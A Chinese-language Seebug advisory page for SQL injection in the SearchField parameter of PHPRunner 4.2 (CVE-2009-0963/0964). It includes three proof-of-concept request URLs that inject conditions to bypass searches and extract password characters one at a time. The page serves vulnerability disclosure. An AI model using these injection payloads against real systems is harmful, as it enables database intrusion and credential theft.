Lucene search
RootSSV:4935HistoryMar 23, 2009 - 12:00 a.m.
PHPRunner SearchField参数SQL注入漏洞
2009-03-2300:00:00
Root
www.seebug.org
18
0.005 Low
EPSS
Percentile
76.6%
BUGTRAQ ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964
PHPRunner是一款PHP网页制作工具,可以生成读写MySql数据库的PHP网页。
PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。
0
XLineSoft PHPRunner 4.2
厂商补丁:
XLineSoft
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--
Related
cve
cve
CVE-2009-0964
2009-03-19 10:30:00
CVE-2009-0963
2009-03-19 10:30:00
prion
prion
Sql injection
2009-03-19 10:30:00
Sql injection
2009-03-19 10:30:00
cvelist
cvelist
CVE-2009-0964
2009-03-19 10:00:00
CVE-2009-0963
2009-03-19 10:00:00
nvd
nvd
CVE-2009-0964
2009-03-19 10:30:00
CVE-2009-0963
2009-03-19 10:30:00